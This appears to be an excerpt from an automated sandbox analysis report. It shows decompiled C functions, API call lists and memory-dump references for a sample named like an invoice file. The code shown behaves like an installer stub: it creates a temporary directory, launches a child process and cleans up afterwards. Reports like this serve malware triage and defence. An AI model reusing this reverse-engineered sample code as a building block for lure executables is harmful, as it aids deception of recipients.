    0x00401c7c
    0x00401c7c
    0x00401c85
    0x00401c8b
    0x00401d74
    0x00401d77
    0x00401e64
    0x00401e65
    0x00401e68
    0x00401708
    0x0040170a
    0x0040170c
    0x00401711
    0x00401714
    0x00401719
    0x0040171d
    0x00401723
    0x00401727
    0x0040172d
    0x00401749
    0x0040174d
    0x00401750
    0x00401750
    0x00401752
    0x0040175a
    0x00401767
    0x0040176c
    0x0040176e
    0x00401770
    0x00401773
    0x00401773
    0x00401775
    0x00401779
    0x0040177b
    0x0040177d
    0x0040177f
    0x00000000
    0x0040177f
    0x00000000
    0x0040177b
    0x0040172f
    0x00401737
    0x0040173e
    0x00401744
    0x00401740
    0x00401740
    0x00401740
    0x0040173e
    0x00401783
    0x00401785
    0x0040178e
    0x00401797
    0x00401797
    0x0040179a
    0x004017aa
    0x00401e6e
    0x00401e73
    0x00401e73
    0x00000000
    0x00000000
    0x00000000
    0x00401c91
    0x00401c91
    0x00401c93
    0x00401c95
    0x00401cf8
    0x00401cf8
    0x00401cfd
    0x00401d01
    0x00000000
    0x00000000
    0x00401d03
    0x00401d05
    0x00401d0c
    0x00000000
    0x00401d0e
    0x00401d12
    0x00401d17
    0x00401d18
    0x00401d19
    0x00401d1e
    0x00401d22
    0x00401d2c
    0x00401d31
    0x00401d32
    0x00000000
    0x00401d32
    0x00401d22
    0x00000000
    0x00401d0c
    0x00401cf8
    0x00401c97
    0x00401c97
    0x00401c97
    0x00401c97
    0x00401c9b
    0x00401c9e
    0x00401ccc
    0x00401cce
    0x00401ce3
    0x00401ce3
    0x00401cd0
    0x00401cd0
    0x00401cd3
    0x00401cd6
    0x00401cd9
    0x00401cdc
    0x00401cde
    0x00401ce1
    0x00000000
    0x00000000
    0x00401ce1
    0x00401ce6
    0x00401ce8
    0x00401cea
    0x00401ced
    0x00401d7d
    0x00401d80
    0x00401d82
    0x00401d84
    0x00401d85
    0x00401d87
    0x00401d38
    0x00401d38
    0x00401d3d
    0x00401d45
    0x00000000
    0x00000000
    0x00401d47
    0x00401d49
    0x00401d50
    0x00000000
    0x00401d52
    0x00401d54
    0x00401d59
    0x00401d5e
    0x00401d66
    0x00401d6a
    0x00000000
    0x00401d6a
    0x00401d66
    0x00000000
    0x00401d50
    0x00401d38
    0x00401d89
    0x00401d89
    0x00401d91
    0x00401d95
    0x00401dcc
    0x00401dcf
    0x00401dd2
    0x00401dd4
    0x00401dda
    0x00401ddc
    0x00401ddc
    0x00401d97
    0x00401d97
    0x00401d97
    0x00401d9a
    0x00401d9a
    0x00401d9e
    0x00401da2
    0x00401de4
    0x00401de7
    0x00401de9
    0x00401deb
    0x00401df1
    0x00401df5
    0x00401df5
    0x00401df1
    0x00401da4
    0x00401daa
    0x00401dfc
    0x00401e06
    0x00401e34
    0x00401e3a
    0x00401e3f
    0x00401e46
    0x00401e50
    0x00401e56
    0x00401e5d
    0x00401e61
    0x00401e08
    0x00401e08
    0x00401e0b
    0x00401e0d
    0x00401e10
    0x00401e13
    0x00401e15
    0x00401e24
    0x00401e29
    0x00401e2c
    0x00401e30
    0x00401e30
    0x00401dac
    0x00401daf
    0x00401db2
    0x00401dba
    0x00401dbf
    0x00401dc6
    0x00401dca
    0x00401dca
    0x00401ca0
    0x00401ca0
    0x00401ca2
    0x00401ca8
    0x00401cab
    0x00401cb4
    0x00401cb7
    0x00401cba
    0x00401cbd
    0x00401cc0
    0x00401cc3
    0x00401cc6
    0x00401cc6
    0x00401cc8
    0x00401cc9
    0x00401cad
    0x00401cad
    0x00401cad
    0x00401caf
    0x00401cb1
    0x00401cb2
    0x00401cb2
    0x00401cab
    0x00401c9e

    APIs
      • Part of subcall function 0040165C: Sleep.KERNEL32(00000000,004016DF,00000000,?,00101000,00000004), ref: 00401672
      • Part of subcall function 0040165C: Sleep.KERNEL32(0000000A,00000000,004016DF,00000000,?,00101000,00000004), ref: 0040168B
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401737
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040175A
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00401767
    • Sleep.KERNEL32(00000000,?), ref: 00401D12
    • Sleep.KERNEL32(0000000A,00000000,?), ref: 00401D2C
    • Sleep.KERNEL32(00000000), ref: 00401D54
    • Sleep.KERNEL32(0000000A,00000000), ref: 00401D6A
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401E24
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 84%
    			E00411C7F(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
    				intOrPtr _t17;
    				intOrPtr _t19;
    				struct HWND__* _t21;
    				struct HWND__* _t22;
    				struct HWND__* _t25;
    				intOrPtr _t26;
    				intOrPtr _t28;
    				intOrPtr _t36;
    				intOrPtr _t39;
    				int _t40;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				struct HWND__* _t46;
    				intOrPtr _t47;
    				intOrPtr _t50;
    				intOrPtr _t60;
    				intOrPtr _t62;
    				intOrPtr _t68;
    				intOrPtr _t69;
    				intOrPtr _t70;
    				void* _t73;
    				void* _t74;
    
    				_t74 = __eflags;
    				_pop(_t62);
    				 *[fs:eax] = _t62;
    				_t17 =  *0x41865c; // 0x1240ef8
    				 *0x41865c = 0;
    				E00403894(_t17);
    				_t19 =  *0x415b48; // 0x400000
    				_t21 = E004068EC(0, L"STATIC", 0, _t19, 0, 0, 0, 0, 0, 0, 0); // executed
    				 *0x412af0 = _t21;
    				_t22 =  *0x412af0; // 0x0
    				 *0x418654 = SetWindowLongW(_t22, 0xfffffffc, E0040EAC4);
    				_t25 =  *0x412af0; // 0x0
    				 *(_t73 - 0x58) = _t25;
    				 *((char*)(_t73 - 0x54)) = 0;
    				_t26 =  *0x418664; // 0x4324c8
    				_t4 = _t26 + 0x20; // 0x1a5fe9
    				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
    				 *((char*)(_t73 - 0x4c)) = 0;
    				_t28 =  *0x418664; // 0x4324c8
    				_t7 = _t28 + 0x24; // 0x29a00
    				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
    				 *((char*)(_t73 - 0x44)) = 0;
    				E004082D4(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
    				_push( *((intOrPtr*)(_t73 - 0x40)));
    				_push( *0x418658);
    				_push(E00411F5C);
    				E0040B84C(_t73 - 0x5c, __ebx, __esi, _t74);
    				_push( *((intOrPtr*)(_t73 - 0x5c)));
    				E0040513C(_t73 - 0x3c, 4, __edi);
    				_t36 =  *0x418670; // 0x122172c, executed
    				E0040EB50(_t36, __ebx, 0x412aec,  *((intOrPtr*)(_t73 - 0x3c)), __edi, __esi, __fp0); // executed
    				if( *0x412ae8 != 0xffffffff) {
    					_t50 =  *0x412ae8; // 0xffffffff
    					E0040EA2C(_t50, 0x412aec);
    				}
    				_pop(_t68);
    				 *[fs:eax] = _t68;
    				_push(0x411e30);
    				_t39 =  *0x41865c; // 0x1240ef8
    				_t40 = E00403894(_t39);
    				if( *0x418670 != 0) {
    					_t70 =  *0x418670; // 0x122172c
    					_t40 = E0040E5DC(0, _t70, 0xfa, 0x32); // executed
    				}
    				if( *0x418668 != 0) {
    					_t47 =  *0x418668; // 0x11f6b0c
    					_t40 = RemoveDirectoryW(E00404D24(_t47)); // executed
    				}
    				if( *0x412af0 != 0) {
    					_t46 =  *0x412af0; // 0x0
    					_t40 = DestroyWindow(_t46); // executed
    				}
    				if( *0x41864c != 0) {
    					_t41 =  *0x41864c; // 0x125da98
    					_t60 =  *0x418650; // 0x1
    					_t69 =  *0x40dcc4; // 0x40dcc8
    					E00405548(_t41, _t60, _t69);
    					_t43 =  *0x41864c; // 0x125da98
    					E00402E20(_t43);
    					 *0x41864c = 0;
    					return 0;
    				}
    				return _t40;
    			}

























    0x00411c7f
    0x00411c81
    0x00411c84
    0x00411caf
    0x00411cb6
    0x00411cbc
    0x00411ccf
    0x00411ce3
    0x00411ce8
    0x00411cf4
    0x00411cff
    0x00411d08
    0x00411d0d
    0x00411d10
    0x00411d14
    0x00411d19
    0x00411d1c
    0x00411d1f
    0x00411d23
    0x00411d28
    0x00411d2b
    0x00411d2e
    0x00411d3f
    0x00411d44
    0x00411d47
    0x00411d4d
    0x00411d55
    0x00411d5a
    0x00411d65
    0x00411d72
    0x00411d77
    0x00411d83
    0x00411d85
    0x00411d8a
    0x00411d8a
    0x00411d91
    0x00411d94
    0x00411d97
    0x00411d9c
    0x00411da1
    0x00411dad
    0x00411dbb
    0x00411dc3
    0x00411dc3
    0x00411dcf
    0x00411dd1
    0x00411ddc
    0x00411ddc
    0x00411de8
    0x00411dea
    0x00411df0
    0x00411df0
    0x00411dfc
    0x00411dfe
    0x00411e03
    0x00411e09
    0x00411e0f
    0x00411e14
    0x00411e19
    0x00411e20
    0x00000000
    0x00411e20
    0x00411e25

    APIs
      • Part of subcall function 004068EC: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,?,?), ref: 0040692B
    • SetWindowLongW.USER32(00000000,000000FC,0040EAC4), ref: 00411CFA
      • Part of subcall function 0040B84C: GetCommandLineW.KERNEL32(00000000,0040B88E,?,?,00000000,?,00411D5A,00411F5C,?), ref: 0040B862
      • Part of subcall function 0040EB50: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040EBC0
      • Part of subcall function 0040EB50: CloseHandle.KERNEL32(00000000), ref: 0040EBD4
      • Part of subcall function 0040EB50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040EBED
      • Part of subcall function 0040EB50: GetExitCodeProcess.KERNEL32(?,00412AEC), ref: 0040EC01
      • Part of subcall function 0040EB50: CloseHandle.KERNEL32(?), ref: 0040EC0A
    • DestroyWindow.USER32(00000000), ref: 00411DF0
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E60B
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628
    • RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411DDC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 62%
    			E0040EB50(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
    				char _v8;
    				struct _STARTUPINFOW _v76;
    				void* _v88;
    				void* _v92;
    				int _t23;
    				long _t28;
    				intOrPtr _t49;
    				DWORD* _t51;
    				void* _t56;
    
    				_v8 = 0;
    				_t51 = __ecx;
    				_t53 = __edx;
    				_t41 = __eax;
    				_push(_t56);
    				_push(0x40ec25);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t56 + 0xffffffa8;
    				_push(0x40ec40);
    				_push(__eax);
    				_push(0x40ec50);
    				_push(__edx);
    				E0040513C( &_v8, 4, __ecx);
    				E00403250( &_v76, 0x44);
    				_v76.cb = 0x44;
    				_t23 = CreateProcessW(0, E00404D24(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
    				_t58 = _t23;
    				if(_t23 == 0) {
    					E0040E770(0x6a, _t41, 0, _t53, _t58);
    				}
    				CloseHandle(_v88);
    				do {
    					E0040EB24();
    					_t28 = MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0xff); // executed
    				} while (_t28 == 1);
    				E0040EB24();
    				GetExitCodeProcess(_v92, _t51); // executed
    				CloseHandle(_v92);
    				_pop(_t49);
    				 *[fs:eax] = _t49;
    				_push(E0040EC2C);
    				return L00404C88( &_v8);
    			}












    0x0040eb5b
    0x0040eb5e
    0x0040eb60
    0x0040eb62
    0x0040eb66
    0x0040eb67
    0x0040eb6c
    0x0040eb6f
    0x0040eb72
    0x0040eb77
    0x0040eb78
    0x0040eb7d
    0x0040eb86
    0x0040eb95
    0x0040eb9a
    0x0040ebc0
    0x0040ebc5
    0x0040ebc7
    0x0040ebcb
    0x0040ebcb
    0x0040ebd4
    0x0040ebd9
    0x0040ebd9
    0x0040ebed
    0x0040ebf2
    0x0040ebf7
    0x0040ec01
    0x0040ec0a
    0x0040ec11
    0x0040ec14
    0x0040ec17
    0x0040ec24

    APIs
    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040EBC0
    • CloseHandle.KERNEL32(00000000), ref: 0040EBD4
      • Part of subcall function 0040EB24: TranslateMessage.USER32 ref: 0040EB2D
      • Part of subcall function 0040EB24: DispatchMessageW.USER32 ref: 0040EB33
      • Part of subcall function 0040EB24: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040EB41
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040EBED
    • GetExitCodeProcess.KERNEL32(?,00412AEC), ref: 0040EC01
    • CloseHandle.KERNEL32(?), ref: 0040EC0A
      • Part of subcall function 0040E770: GetLastError.KERNEL32(00000000,0040E817,?,?,0122172C), ref: 0040E793
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 54%
    			E00411648(void* __ebx, void* __ecx, void* __edx, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _t16;
    				intOrPtr _t32;
    				intOrPtr _t41;
    
    				_t27 = __ebx;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(_t41);
    				_push(0x411712);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				 *0x418518 =  *0x418518 - 1;
    				if( *0x418518 < 0) {
    					 *0x41851c = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
    					 *0x418520 = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
    					if( *0x41851c == 0 ||  *0x418520 == 0) {
    						_t16 = 0;
    					} else {
    						_t16 = 1;
    					}
    					 *0x418524 = _t16;
    					E0040B9D0( &_v12);
    					E0040B2E0(_v12,  &_v8);
    					E00404F98( &_v8, L"shell32.dll");
    					E0040AC84(_v8, _t27, 0x8000); // executed
    					E0040BF84(0x4c783afb,  &_v16);
    				}
    				_pop(_t32);
    				 *[fs:eax] = _t32;
    				_push(E00411719);
    				return L00404C90( &_v16, 3);
    			}









    0x00411648
    0x0041164b
    0x0041164d
    0x0041164f
    0x00411653
    0x00411654
    0x00411659
    0x0041165c
    0x0041165f
    0x00411666
    0x00411681
    0x0041169b
    0x004116a7
    0x004116b2
    0x004116b6
    0x004116b6
    0x004116b6
    0x004116b8
    0x004116c0
    0x004116cb
    0x004116d8
    0x004116e5
    0x004116f2
    0x004116f2
    0x004116f9
    0x004116fc
    0x004116ff
    0x00411711

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00411712,?,00000000,00000000,00000000), ref: 00411676
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040674C
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,00000000,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040676E
    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00411712,?,00000000,00000000,00000000), ref: 00411690
      • Part of subcall function 0040B9D0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040B9E3
      • Part of subcall function 0040AC84: SetErrorMode.KERNEL32 ref: 0040AC8E
      • Part of subcall function 0040AC84: LoadLibraryW.KERNEL32(00000000), ref: 0040ACBD
      • Part of subcall function 0040BF84: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,0040C156,00000000,0040C1A7,?,0040C360), ref: 0040BFA3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 67%
    			E0040E414(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char* _v16;
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				int _t30;
    				intOrPtr _t63;
    				void* _t71;
    				void* _t73;
    				intOrPtr _t75;
    				intOrPtr _t76;
    
    				_t71 = __edi;
    				_t54 = __ebx;
    				_t75 = _t76;
    				_t55 = 4;
    				do {
    					_push(0);
    					_push(0);
    					_t55 = _t55 - 1;
    				} while (_t55 != 0);
    				_push(_t55);
    				_push(__ebx);
    				_t73 = __eax;
    				_t78 = 0;
    				_push(_t75);
    				_push(0x40e509);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t76;
    				while(1) {
    					E0040B9FC( &_v12, _t54, _t55, _t78); // executed
    					_t55 = L".tmp";
    					E0040E2F8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
    					_t30 = CreateDirectoryW(E00404D24(_v8), 0); // executed
    					if(_t30 != 0) {
    						break;
    					}
    					_t54 = GetLastError();
    					_t78 = _t54 - 0xb7;
    					if(_t54 != 0xb7) {
    						_push( &_v16);
    						E0040DF20(0x36,  &_v32, _v8);
    						_v28 = _v32;
    						E00407EE8( &_v36, _t54);
    						_v24 = _v36;
    						E0040BF84(_t54,  &_v40);
    						_v20 = _v40;
    						E0040DEF0(0x68, 2,  &_v28, 0);
    						_t55 = _v16;
    						E00409824(_v16, 1);
    						E00403F88();
    					}
    				}
    				E00404C98(_t73, _v8);
    				__eflags = 0;
    				_pop(_t63);
    				 *[fs:eax] = _t63;
    				_push(E0040E510);
    				L00404C90( &_v40, 3);
    				return L00404C90( &_v16, 3);
    			}


















    0x0040e414
    0x0040e414
    0x0040e415
    0x0040e417
    0x0040e41c
    0x0040e41c
    0x0040e41e
    0x0040e420
    0x0040e420
    0x0040e423
    0x0040e424
    0x0040e426
    0x0040e428
    0x0040e42a
    0x0040e42b
    0x0040e430
    0x0040e433
    0x0040e436
    0x0040e43d
    0x0040e445
    0x0040e44c
    0x0040e45c
    0x0040e463
    0x00000000
    0x00000000
    0x0040e46a
    0x0040e46c
    0x0040e472
    0x0040e477
    0x0040e480
    0x0040e488
    0x0040e494
    0x0040e49c
    0x0040e4a4
    0x0040e4ac
    0x0040e4b9
    0x0040e4be
    0x0040e4c8
    0x0040e4cd
    0x0040e4cd
    0x0040e472
    0x0040e4dc
    0x0040e4e1
    0x0040e4e3
    0x0040e4e6
    0x0040e4e9
    0x0040e4f6
    0x0040e508

    APIs
    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E45C
    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E465
      • Part of subcall function 0040BF84: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,0040C156,00000000,0040C1A7,?,0040C360), ref: 0040BFA3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E004068EC(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
    				WCHAR* _v8;
    				void* _t13;
    				struct HWND__* _t24;
    				WCHAR* _t29;
    				long _t32;
    
    				_v8 = _t29;
    				_t32 = __eax;
    				_t13 = E00403110();
    				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
    				E00403100(_t13);
    				return _t24;
    			}








    0x004068f3
    0x004068f8
    0x004068fa
    0x0040692b
    0x00406934
    0x00406940

    APIs
    • CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,?,?), ref: 0040692B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040E5DC(long __eax, intOrPtr __edx, long _a4, long _a8) {
    				intOrPtr _v8;
    				long _t5;
    				long _t9;
    				void* _t10;
    				void* _t13;
    				void* _t15;
    				void* _t16;
    
    				_t5 = __eax;
    				_v8 = __edx;
    				_t9 = __eax;
    				_t15 = _t10 - 1;
    				if(_t15 < 0) {
    					L10:
    					return _t5;
    				}
    				_t16 = _t15 + 1;
    				_t13 = 0;
    				while(1) {
    					_t19 = _t13 - 1;
    					if(_t13 != 1) {
    						__eflags = _t13 - 1;
    						if(__eflags > 0) {
    							Sleep(_a4);
    						}
    					} else {
    						Sleep(_a8);
    					}
    					_t5 = E0040E168(_t9, _v8, _t19); // executed
    					if(_t5 != 0) {
    						goto L10;
    					}
    					_t5 = GetLastError();
    					if(_t5 == 2) {
    						goto L10;
    					}
    					_t5 = GetLastError();
    					if(_t5 == 3) {
    						goto L10;
    					}
    					_t13 = _t13 + 1;
    					_t16 = _t16 - 1;
    					if(_t16 != 0) {
    						continue;
    					}
    					goto L10;
    				}
    				goto L10;
    			}










    0x0040e5dc
    0x0040e5e3
    0x0040e5e6
    0x0040e5ea
    0x0040e5ed
    0x0040e63b
    0x0040e63b
    0x0040e63b
    0x0040e5ef
    0x0040e5f0
    0x0040e5f2
    0x0040e5f2
    0x0040e5f5
    0x0040e602
    0x0040e605
    0x0040e60b
    0x0040e60b
    0x0040e5f7
    0x0040e5fb
    0x0040e5fb
    0x0040e615
    0x0040e61c
    0x00000000
    0x00000000
    0x0040e61e
    0x0040e626
    0x00000000
    0x00000000
    0x0040e628
    0x0040e630
    0x00000000
    0x00000000
    0x0040e632
    0x0040e633
    0x0040e634
    0x00000000
    0x00000000
    0x00000000
    0x0040e634
    0x00000000

    APIs
    • Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
    • Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E60B
      • Part of subcall function 0040E168: DeleteFileW.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E19F
      • Part of subcall function 0040E168: GetLastError.KERNEL32(00000000,00000000,0040E1C5,?,0000000D,00000000), ref: 0040E1A7
    • GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
    • GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 373 4015e4-401601 call 401578 VirtualAlloc 376 401603-40164f 373->376 377 401650-40165a 373->377
    C-Code - Quality: 100%
    			E004015E4(signed int __eax) {
    				void* _t4;
    				intOrPtr _t7;
    				signed int _t8;
    				void* _t10;
    				void** _t15;
    				void* _t17;
    
    				_t8 = __eax;
    				E00401578(__eax);
    				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
    				if(_t4 == 0) {
    					 *0x413a3c = 0;
    					return 0;
    				} else {
    					_t15 =  *0x413a28; // 0x413a24
    					_t10 = _t4;
    					 *_t10 = 0x413a24;
    					 *0x413a28 = _t4;
    					 *(_t10 + 4) = _t15;
    					 *_t15 = _t4;
    					_t17 = _t4 + 0x13fff0;
    					 *((intOrPtr*)(_t17 - 4)) = 2;
    					 *0x413a3c = 0x13ffe0 - _t8;
    					_t7 = _t17 - _t8;
    					 *0x413a38 = _t7;
    					 *(_t7 - 4) = _t8 | 0x00000002;
    					return _t7;
    				}
    			}









    0x004015e5
    0x004015e7
    0x004015fa
    0x00401601
    0x00401652
    0x0040165a
    0x00401603
    0x00401603
    0x00401609
    0x0040160b
    0x00401611
    0x00401616
    0x00401619
    0x0040161d
    0x00401628
    0x00401635
    0x0040163d
    0x0040163f
    0x0040164c
    0x0040164f
    0x0040164f

    APIs
    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401BF3), ref: 004015FA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 53%
    			E004119ED(signed int __ebx, void* __edi, void* __esi, void* __fp0) {
    				signed char _t70;
    				intOrPtr _t82;
    				void* _t96;
    				void* _t98;
    
    				_t96 = __edi;
    				_pop(_t82);
    				_pop(_t73);
    				 *[fs:eax] = _t82;
    				E0040EAA0(_t73);
    				_t70 = __ebx >> 1;
    				_push(__esi);
    				 *((intOrPtr*)(_t98 + 0x50)) =  *((intOrPtr*)(_t98 + 0x50)) + __esi;
    			}







    0x004119ed
    0x004119ef
    0x004119f1
    0x004119f2
    0x00411a12
    0x00411a14
    0x00411a16
    0x00411a1d

    APIs
    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 00411A57
      • Part of subcall function 004030BC: QueryPerformanceCounter.KERNEL32 ref: 004030C0
      • Part of subcall function 004030BC: GetTickCount.KERNEL32 ref: 004030D4
      • Part of subcall function 0040E414: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E45C
      • Part of subcall function 0040E414: GetLastError.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E465
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
